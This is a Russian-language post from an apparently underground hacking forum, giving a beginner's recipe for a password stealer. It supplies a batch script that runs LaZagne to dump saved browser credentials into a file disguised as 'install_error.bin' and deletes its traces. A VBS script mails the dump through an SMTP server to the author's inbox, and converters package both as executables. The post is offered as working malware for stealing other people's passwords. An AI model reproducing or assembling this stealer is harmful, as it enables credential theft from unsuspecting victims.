• XSS.stack #1 – первый литературный журнал от юзеров форума

Собираем свой простейший стиллер (для школьников)

lukas

(L3) cache
Пользователь
Регистрация
11.10.2018
Сообщения
282
Реакции
691
Статейка для новичков, чтобы с чего-то начать, не тратясь на сложные механизмы или инструменты

Собираем свой простенький стиллер (для школьников)

Вирус: стиллер
Способ отправки отчета: почтовый ящик
Сложность: проще некуда
Поддерживаемые браузеры на момент написания статьи: IE, Chrome, Firefox, Opera
Нам понадобится:
1. LaZagne - прога для восстановления паролей и записи их в файл.
2. Batch файл для запуска LaZagne и указания директории сохранения отчета и его имени.
3. Скрипт на VBS для отправки письма на почтовый адрес.
4. Конвертер VBS to EXE(по желанию, можно и без него).
5. Конвертер BAT to EXE.

Шаг 1.
Создаем Batch файл со следующими строками:
Код:
off
laZagne.exe all > D:\install_error.bin
TIMEOUT /T 2
sender.exe
TIMEOUT /T 5
del /s "%UserProfile%\Downloads\laZagne.exe"
del /s "%UserProfile%\Downloads\SENDER.exe"
del /s "%UserProfile%\Desktop\laZagne.exe"
del /s "%UserProfile%\Desktop\SENDER.exe"
где "D:\install_error.bin" - директория и имя сохраненного отчета, TIMEOUT - необходим для ожидания создания отчета(в среднем занимает этот процесс 1 секунду для 100 паролей).

Шаг 2.
Создаем обычный текстовый документ в Notepad++, например. И сохраняем его в формате .vbs
Код:
Код:
Dim o_Mess, v_Conf
v_Conf = "http://schemas.microsoft.com/cdo/configuration/"
Set o_Mess = CreateObject("CDO.Message")
With o_Mess
.To = "получатель@mail.ru" 'куда отправляем
.From = "Имя <отправитель@mail.ru>" 'имя отправителя + Email
.Subject = "Log" 'Тема письма
.TextBody = "BodyMail" 'Сообщение
.AddAttachment "D:\install_error.bin" 'Прикрепить файл
.TextBodyPart.Charset = "windows-1251" 'русская кодировка
With .Configuration.Fields
.Item(v_Conf & "sendusing") = 2 'без использования каталога Server Exchange
.Item(v_Conf & "smtpserver") = "smtp.mail.ru" 'Адрес SMTP-сервера
.Item(v_Conf & "smtpauthenticate") = 1 'Тип авторизации
.Item(v_Conf & "sendusername") = "отправитель@mail.ru" 'здесь имя пользователя
.Item(v_Conf & "sendpassword") = "пароль отправителя" 'пароль
.Item(v_Conf & "smtpserverport") = 465 'порт (альтернативный - 465)
.Item(v_Conf & "smtpusessl") = True 'использовать ли шифрованое подключение SSL
.Item(v_Conf & "smtpconnectiontimeout") = 60 'Время до завершения повторных попыток подключения
.Update
End With
.send
End With
Set o_Mess = Nothing

Шаг 3.
Компилируем данную кашу через BAT to EXE конвертер.
Примечание: Обратите внимание на файл SENDER.EXE, в данном случае использовался конвертер VBS to EXE.
46217a2385616036cbb62.png

После, сохраняем наш .exe файл и запускаем его.

Шаг 4.
Заходим на почтовый ящик и проверяем письмо.
2226293a8c76c68d7b1ad.png


Шаг 5.
Открываем файл у себя на компьютере через текстовый редактор и радуемся профиту.
1a3b3bc5aa417ed345874.png
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх